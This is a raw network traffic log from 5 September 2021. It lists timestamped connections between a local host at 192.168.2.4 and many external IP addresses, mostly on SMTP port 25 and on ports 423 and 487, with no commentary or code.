Sep 5, 2021 15:50:45.525047064 CEST	25	50066	62.141.42.208	192.168.2.4
Sep 5, 2021 15:50:45.525178909 CEST	50066	25	192.168.2.4	62.141.42.208
Sep 5, 2021 15:50:45.525229931 CEST	423	50062	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:45.525300026 CEST	50062	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:45.532361984 CEST	423	50073	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:45.532474995 CEST	50073	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:45.535204887 CEST	423	50060	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:45.535366058 CEST	50060	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:45.542584896 CEST	423	50072	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:45.542793989 CEST	50072	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:45.550930023 CEST	25	50067	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:45.551081896 CEST	50067	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:45.564794064 CEST	423	50073	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:45.565115929 CEST	50073	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:45.565341949 CEST	423	50065	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:45.565445900 CEST	50065	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:45.565633059 CEST	423	50057	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:45.565705061 CEST	50057	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:45.566592932 CEST	423	50070	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:45.566698074 CEST	50070	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:45.566998005 CEST	423	50071	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:45.567071915 CEST	50071	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:45.567493916 CEST	423	50058	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:45.567604065 CEST	50058	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:45.575973034 CEST	423	50059	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:45.576103926 CEST	50059	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:45.584110022 CEST	423	50072	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:45.584433079 CEST	50072	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:45.596700907 CEST	423	50073	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:45.596858025 CEST	25	50055	52.47.149.86	192.168.2.4
Sep 5, 2021 15:50:45.605622053 CEST	25	50067	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:45.611295938 CEST	50055	25	192.168.2.4	52.47.149.86
Sep 5, 2021 15:50:45.626462936 CEST	423	50072	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:45.634480953 CEST	423	50065	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:45.634619951 CEST	423	50070	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:45.634645939 CEST	423	50071	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:45.638416052 CEST	25	50055	52.47.149.86	192.168.2.4
Sep 5, 2021 15:50:45.649024963 CEST	25	50055	52.47.149.86	192.168.2.4
Sep 5, 2021 15:50:45.649110079 CEST	25	50068	96.114.157.80	192.168.2.4
Sep 5, 2021 15:50:45.649363041 CEST	50068	25	192.168.2.4	96.114.157.80
Sep 5, 2021 15:50:45.650446892 CEST	25	50069	96.114.157.80	192.168.2.4
Sep 5, 2021 15:50:45.650562048 CEST	50069	25	192.168.2.4	96.114.157.80
Sep 5, 2021 15:50:45.696636915 CEST	50065	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:45.696799040 CEST	50070	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:45.790414095 CEST	50071	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:45.790414095 CEST	50067	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:45.794369936 CEST	50055	25	192.168.2.4	52.47.149.86
Sep 5, 2021 15:50:45.990283012 CEST	25	50068	96.114.157.80	192.168.2.4
Sep 5, 2021 15:50:45.990345955 CEST	25	50069	96.114.157.80	192.168.2.4
Sep 5, 2021 15:50:45.990382910 CEST	25	50068	96.114.157.80	192.168.2.4
Sep 5, 2021 15:50:45.990413904 CEST	25	50069	96.114.157.80	192.168.2.4
Sep 5, 2021 15:50:45.990513086 CEST	50068	25	192.168.2.4	96.114.157.80
Sep 5, 2021 15:50:45.994396925 CEST	50069	25	192.168.2.4	96.114.157.80
Sep 5, 2021 15:50:46.018908024 CEST	50067	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:46.019351959 CEST	50065	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:46.019682884 CEST	50070	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:46.020044088 CEST	50071	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:46.024030924 CEST	50055	25	192.168.2.4	52.47.149.86
Sep 5, 2021 15:50:46.047326088 CEST	50068	25	192.168.2.4	96.114.157.80
Sep 5, 2021 15:50:46.054491997 CEST	25	50055	52.47.149.86	192.168.2.4
Sep 5, 2021 15:50:46.054634094 CEST	50055	25	192.168.2.4	52.47.149.86
Sep 5, 2021 15:50:46.058161974 CEST	50069	25	192.168.2.4	96.114.157.80
Sep 5, 2021 15:50:46.063421965 CEST	50055	25	192.168.2.4	52.47.149.86
Sep 5, 2021 15:50:46.073725939 CEST	25	50067	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:46.076776981 CEST	25	50067	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:46.086391926 CEST	50067	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:46.088622093 CEST	423	50070	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:46.088666916 CEST	423	50071	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:46.089059114 CEST	423	50065	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:46.090452909 CEST	25	50055	52.47.149.86	192.168.2.4
Sep 5, 2021 15:50:46.141357899 CEST	25	50067	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:46.155262947 CEST	50067	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:46.185233116 CEST	50074	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:46.200587988 CEST	25	50068	96.114.157.80	192.168.2.4
Sep 5, 2021 15:50:46.210546017 CEST	25	50069	96.114.157.80	192.168.2.4
Sep 5, 2021 15:50:46.215320110 CEST	25	50067	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:46.258516073 CEST	487	50074	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:46.258630037 CEST	50074	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:46.380702019 CEST	487	50074	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:46.493568897 CEST	50074	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:46.572707891 CEST	25	50067	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:46.790529013 CEST	50067	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:47.288073063 CEST	50075	25	192.168.2.4	67.195.228.111
Sep 5, 2021 15:50:47.288203001 CEST	50074	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:47.306709051 CEST	50067	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:47.359893084 CEST	25	50067	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:47.360357046 CEST	25	50067	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:47.361514091 CEST	487	50074	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:47.392975092 CEST	487	50074	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:47.414019108 CEST	50074	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:47.414202929 CEST	50074	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:47.419836998 CEST	50067	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:47.454329014 CEST	25	50075	67.195.228.111	192.168.2.4
Sep 5, 2021 15:50:47.454436064 CEST	50075	25	192.168.2.4	67.195.228.111
Sep 5, 2021 15:50:47.472980022 CEST	25	50067	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:47.473145008 CEST	25	50067	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:47.473160028 CEST	25	50067	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:47.473174095 CEST	25	50067	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:47.473215103 CEST	25	50067	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:47.478070021 CEST	50064	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:47.478332043 CEST	50076	25	192.168.2.4	64.98.36.4
Sep 5, 2021 15:50:47.478866100 CEST	50077	25	192.168.2.4	52.73.137.222
Sep 5, 2021 15:50:47.479012966 CEST	50078	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:47.489049911 CEST	487	50074	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:47.489293098 CEST	487	50074	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:47.503479958 CEST	423	50064	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:47.503613949 CEST	50064	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:47.503756046 CEST	423	50078	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:47.503850937 CEST	50078	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:47.526540041 CEST	50080	25	192.168.2.4	17.42.251.10
Sep 5, 2021 15:50:47.528733969 CEST	487	50074	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:47.528831005 CEST	423	50078	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:47.529006958 CEST	50078	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:47.529748917 CEST	487	50074	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:47.529939890 CEST	50074	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:47.530342102 CEST	50074	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:47.530539989 CEST	50074	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:47.530596018 CEST	50074	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:47.530754089 CEST	50074	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:47.530842066 CEST	50074	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:47.530893087 CEST	50074	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:47.530982018 CEST	50074	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:47.531028986 CEST	50074	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:47.537064075 CEST	25	50066	62.141.42.208	192.168.2.4
Sep 5, 2021 15:50:47.550415993 CEST	50066	25	192.168.2.4	62.141.42.208
Sep 5, 2021 15:50:47.554073095 CEST	423	50078	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:47.577877998 CEST	25	50066	62.141.42.208	192.168.2.4
Sep 5, 2021 15:50:47.577898979 CEST	25	50066	62.141.42.208	192.168.2.4
Sep 5, 2021 15:50:47.583554029 CEST	25	50076	64.98.36.4	192.168.2.4
Sep 5, 2021 15:50:47.583640099 CEST	50076	25	192.168.2.4	64.98.36.4
Sep 5, 2021 15:50:47.585097075 CEST	25	50067	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:47.585134983 CEST	25	50067	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:47.585203886 CEST	50067	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:47.586888075 CEST	50066	25	192.168.2.4	62.141.42.208
Sep 5, 2021 15:50:47.594980001 CEST	50067	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:47.603203058 CEST	487	50074	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:47.603343010 CEST	487	50074	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:47.603740931 CEST	487	50074	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:47.603944063 CEST	487	50074	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:47.604377031 CEST	487	50074	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:47.604773998 CEST	487	50074	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:47.605134964 CEST	487	50074	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:47.605413914 CEST	487	50074	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:47.605629921 CEST	487	50074	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:47.614207983 CEST	25	50066	62.141.42.208	192.168.2.4
Sep 5, 2021 15:50:47.614284992 CEST	25	50066	62.141.42.208	192.168.2.4
Sep 5, 2021 15:50:47.626687050 CEST	50066	25	192.168.2.4	62.141.42.208
Sep 5, 2021 15:50:47.636466980 CEST	25	50077	52.73.137.222	192.168.2.4
Sep 5, 2021 15:50:47.636555910 CEST	50077	25	192.168.2.4	52.73.137.222
Sep 5, 2021 15:50:47.636989117 CEST	25	50080	17.42.251.10	192.168.2.4
Sep 5, 2021 15:50:47.637042046 CEST	487	50074	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:47.637090921 CEST	50080	25	192.168.2.4	17.42.251.10
Sep 5, 2021 15:50:47.648212910 CEST	25	50067	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:47.654865026 CEST	487	50074	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:47.654885054 CEST	25	50066	62.141.42.208	192.168.2.4
Sep 5, 2021 15:50:47.654891968 CEST	25	50066	62.141.42.208	192.168.2.4
Sep 5, 2021 15:50:47.654944897 CEST	50074	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:47.679646969 CEST	50074	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:47.696793079 CEST	50066	25	192.168.2.4	62.141.42.208
Sep 5, 2021 15:50:47.749530077 CEST	25	50076	64.98.36.4	192.168.2.4
Sep 5, 2021 15:50:47.754405975 CEST	487	50074	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:47.777853966 CEST	25	50077	52.73.137.222	192.168.2.4
Sep 5, 2021 15:50:47.777894974 CEST	25	50077	52.73.137.222	192.168.2.4
Sep 5, 2021 15:50:47.778038025 CEST	50077	25	192.168.2.4	52.73.137.222
Sep 5, 2021 15:50:47.778963089 CEST	25	50075	67.195.228.111	192.168.2.4
Sep 5, 2021 15:50:47.790551901 CEST	50076	25	192.168.2.4	64.98.36.4
Sep 5, 2021 15:50:47.884311914 CEST	50070	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:47.884318113 CEST	50065	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:47.884378910 CEST	50071	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:47.884392977 CEST	50072	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:47.884404898 CEST	50073	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:47.897883892 CEST	50066	25	192.168.2.4	62.141.42.208
Sep 5, 2021 15:50:47.916091919 CEST	423	50073	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:47.916244030 CEST	50073	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:47.922804117 CEST	50081	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:47.922848940 CEST	50076	25	192.168.2.4	64.98.36.4
Sep 5, 2021 15:50:47.925352097 CEST	25	50066	62.141.42.208	192.168.2.4
Sep 5, 2021 15:50:47.925375938 CEST	423	50072	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:47.925535917 CEST	50072	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:47.951944113 CEST	423	50071	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:47.952065945 CEST	423	50070	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:47.952153921 CEST	50071	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:47.952156067 CEST	50070	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:47.952470064 CEST	423	50065	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:47.952553034 CEST	50065	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:47.954539061 CEST	50077	25	192.168.2.4	52.73.137.222
Sep 5, 2021 15:50:47.964476109 CEST	50075	25	192.168.2.4	67.195.228.111
Sep 5, 2021 15:50:47.969796896 CEST	50082	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:47.984509945 CEST	50083	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:47.985994101 CEST	50084	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:47.986473083 CEST	50066	25	192.168.2.4	62.141.42.208
Sep 5, 2021 15:50:47.987329006 CEST	50085	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:47.991353989 CEST	423	50081	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:47.991465092 CEST	50081	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:48.013820887 CEST	25	50066	62.141.42.208	192.168.2.4
Sep 5, 2021 15:50:48.013844013 CEST	25	50066	62.141.42.208	192.168.2.4
Sep 5, 2021 15:50:48.013850927 CEST	25	50066	62.141.42.208	192.168.2.4
Sep 5, 2021 15:50:48.013858080 CEST	25	50066	62.141.42.208	192.168.2.4
Sep 5, 2021 15:50:48.013870955 CEST	25	50066	62.141.42.208	192.168.2.4
Sep 5, 2021 15:50:48.013974905 CEST	50066	25	192.168.2.4	62.141.42.208
Sep 5, 2021 15:50:48.017919064 CEST	423	50085	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:48.018048048 CEST	50085	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:48.023510933 CEST	25	50080	17.42.251.10	192.168.2.4
Sep 5, 2021 15:50:48.023530960 CEST	25	50080	17.42.251.10	192.168.2.4
Sep 5, 2021 15:50:48.023751974 CEST	50080	25	192.168.2.4	17.42.251.10
Sep 5, 2021 15:50:48.026609898 CEST	423	50084	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:48.026736021 CEST	50084	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:48.027786016 CEST	25	50076	64.98.36.4	192.168.2.4
Sep 5, 2021 15:50:48.029381037 CEST	25	50076	64.98.36.4	192.168.2.4
Sep 5, 2021 15:50:48.029458046 CEST	50076	25	192.168.2.4	64.98.36.4
Sep 5, 2021 15:50:48.041335106 CEST	50080	25	192.168.2.4	17.42.251.10
Sep 5, 2021 15:50:48.041443110 CEST	423	50082	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:48.041470051 CEST	25	50066	62.141.42.208	192.168.2.4
Sep 5, 2021 15:50:48.041549921 CEST	50082	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:48.043032885 CEST	25	50066	62.141.42.208	192.168.2.4
Sep 5, 2021 15:50:48.048964024 CEST	423	50085	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:48.051362038 CEST	50085	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:48.051635027 CEST	423	50083	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:48.051717043 CEST	50083	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:48.060169935 CEST	423	50081	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:48.060281992 CEST	50066	25	192.168.2.4	62.141.42.208
Sep 5, 2021 15:50:48.060384035 CEST	50081	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:48.067687988 CEST	423	50084	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:48.067972898 CEST	50084	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:48.073982954 CEST	50086	25	192.168.2.4	3.130.46.147
Sep 5, 2021 15:50:48.075341940 CEST	50088	25	192.168.2.4	52.73.137.222
Sep 5, 2021 15:50:48.083410025 CEST	423	50085	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:48.088973999 CEST	25	50066	62.141.42.208	192.168.2.4
Sep 5, 2021 15:50:48.088994980 CEST	25	50066	62.141.42.208	192.168.2.4
Sep 5, 2021 15:50:48.089211941 CEST	50066	25	192.168.2.4	62.141.42.208
Sep 5, 2021 15:50:48.089245081 CEST	50066	25	192.168.2.4	62.141.42.208
Sep 5, 2021 15:50:48.093456030 CEST	25	50077	52.73.137.222	192.168.2.4
Sep 5, 2021 15:50:48.108879089 CEST	423	50084	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:48.113769054 CEST	423	50082	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:48.113998890 CEST	50082	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:48.117412090 CEST	25	50066	62.141.42.208	192.168.2.4
Sep 5, 2021 15:50:48.120604038 CEST	423	50083	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:48.120798111 CEST	50083	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:48.130088091 CEST	423	50081	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:48.130477905 CEST	25	50075	67.195.228.111	192.168.2.4
Sep 5, 2021 15:50:48.130511999 CEST	25	50075	67.195.228.111	192.168.2.4
Sep 5, 2021 15:50:48.139487982 CEST	50075	25	192.168.2.4	67.195.228.111
Sep 5, 2021 15:50:48.152472973 CEST	25	50080	17.42.251.10	192.168.2.4
Sep 5, 2021 15:50:48.180135965 CEST	50089	25	192.168.2.4	87.98.164.155
Sep 5, 2021 15:50:48.186418056 CEST	423	50082	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:48.188247919 CEST	423	50083	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:48.206322908 CEST	25	50089	87.98.164.155	192.168.2.4
Sep 5, 2021 15:50:48.206414938 CEST	50089	25	192.168.2.4	87.98.164.155
Sep 5, 2021 15:50:48.222456932 CEST	25	50086	3.130.46.147	192.168.2.4
Sep 5, 2021 15:50:48.222604990 CEST	50086	25	192.168.2.4	3.130.46.147
Sep 5, 2021 15:50:48.249423981 CEST	25	50089	87.98.164.155	192.168.2.4
Sep 5, 2021 15:50:48.259349108 CEST	50078	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:48.264395952 CEST	50090	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:48.284374952 CEST	423	50078	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:48.284470081 CEST	50078	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:48.289378881 CEST	423	50090	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:48.289509058 CEST	50090	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:48.305917025 CEST	25	50075	67.195.228.111	192.168.2.4
Sep 5, 2021 15:50:48.305960894 CEST	25	50075	67.195.228.111	192.168.2.4
Sep 5, 2021 15:50:48.306029081 CEST	50075	25	192.168.2.4	67.195.228.111
Sep 5, 2021 15:50:48.314704895 CEST	423	50090	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:48.314927101 CEST	50090	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:48.324753046 CEST	50075	25	192.168.2.4	67.195.228.111
Sep 5, 2021 15:50:48.339965105 CEST	423	50090	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:48.384371996 CEST	50089	25	192.168.2.4	87.98.164.155
Sep 5, 2021 15:50:48.399977922 CEST	50081	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:48.400012016 CEST	50084	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:48.400070906 CEST	50085	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:48.400707960 CEST	50091	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:48.401123047 CEST	50092	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:48.401552916 CEST	50093	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:48.402350903 CEST	50089	25	192.168.2.4	87.98.164.155
Sep 5, 2021 15:50:48.428550959 CEST	25	50089	87.98.164.155	192.168.2.4
Sep 5, 2021 15:50:48.430798054 CEST	423	50085	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:48.430996895 CEST	50085	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:48.432874918 CEST	423	50093	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:48.433020115 CEST	50093	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:48.437220097 CEST	50089	25	192.168.2.4	87.98.164.155
Sep 5, 2021 15:50:48.441010952 CEST	423	50084	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:48.441128969 CEST	50084	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:48.443058014 CEST	423	50092	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:48.443186045 CEST	50092	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:48.464854002 CEST	423	50093	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:48.464905024 CEST	25	50089	87.98.164.155	192.168.2.4
Sep 5, 2021 15:50:48.465225935 CEST	50093	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:48.468764067 CEST	423	50081	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:48.468838930 CEST	50081	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:48.470196009 CEST	423	50091	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:48.470299959 CEST	50091	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:48.477808952 CEST	50089	25	192.168.2.4	87.98.164.155
Sep 5, 2021 15:50:48.486151934 CEST	423	50092	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:48.486382961 CEST	50092	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:48.490747929 CEST	25	50075	67.195.228.111	192.168.2.4
Sep 5, 2021 15:50:48.491266966 CEST	50094	25	192.168.2.4	176.9.75.42
Sep 5, 2021 15:50:48.496033907 CEST	423	50093	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:48.515593052 CEST	25	50094	176.9.75.42	192.168.2.4
Sep 5, 2021 15:50:48.515741110 CEST	50094	25	192.168.2.4	176.9.75.42
Sep 5, 2021 15:50:48.529266119 CEST	423	50092	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:48.539803028 CEST	423	50091	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:48.540026903 CEST	50091	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:48.540108919 CEST	50082	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:48.540141106 CEST	50083	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:48.540802002 CEST	50095	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:48.541666985 CEST	50096	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:48.544243097 CEST	25	50086	3.130.46.147	192.168.2.4
Sep 5, 2021 15:50:48.556745052 CEST	50086	25	192.168.2.4	3.130.46.147
Sep 5, 2021 15:50:48.597466946 CEST	25	50094	176.9.75.42	192.168.2.4
Sep 5, 2021 15:50:48.609117031 CEST	423	50083	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:48.609227896 CEST	50083	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:48.609874010 CEST	50094	25	192.168.2.4	176.9.75.42
Sep 5, 2021 15:50:48.610910892 CEST	423	50091	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:48.613915920 CEST	423	50095	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:48.614022017 CEST	423	50082	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:48.614070892 CEST	50095	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:48.614088058 CEST	50082	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:48.614922047 CEST	423	50096	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:48.615051031 CEST	50096	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:48.632931948 CEST	25	50094	176.9.75.42	192.168.2.4
Sep 5, 2021 15:50:48.644299030 CEST	25	50094	176.9.75.42	192.168.2.4
Sep 5, 2021 15:50:48.652559996 CEST	50094	25	192.168.2.4	176.9.75.42
Sep 5, 2021 15:50:48.655709028 CEST	50097	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:48.675612926 CEST	25	50094	176.9.75.42	192.168.2.4
Sep 5, 2021 15:50:48.686206102 CEST	423	50095	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:48.686537981 CEST	50095	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:48.686932087 CEST	423	50096	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:48.687139988 CEST	50096	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:48.705117941 CEST	25	50086	3.130.46.147	192.168.2.4
Sep 5, 2021 15:50:48.708542109 CEST	25	50089	87.98.164.155	192.168.2.4
Sep 5, 2021 15:50:48.712584972 CEST	50090	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:48.713035107 CEST	50098	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:48.714482069 CEST	25	50086	3.130.46.147	192.168.2.4
Sep 5, 2021 15:50:48.722631931 CEST	50086	25	192.168.2.4	3.130.46.147
Sep 5, 2021 15:50:48.722891092 CEST	487	50097	193.56.146.188	192.168.2.4
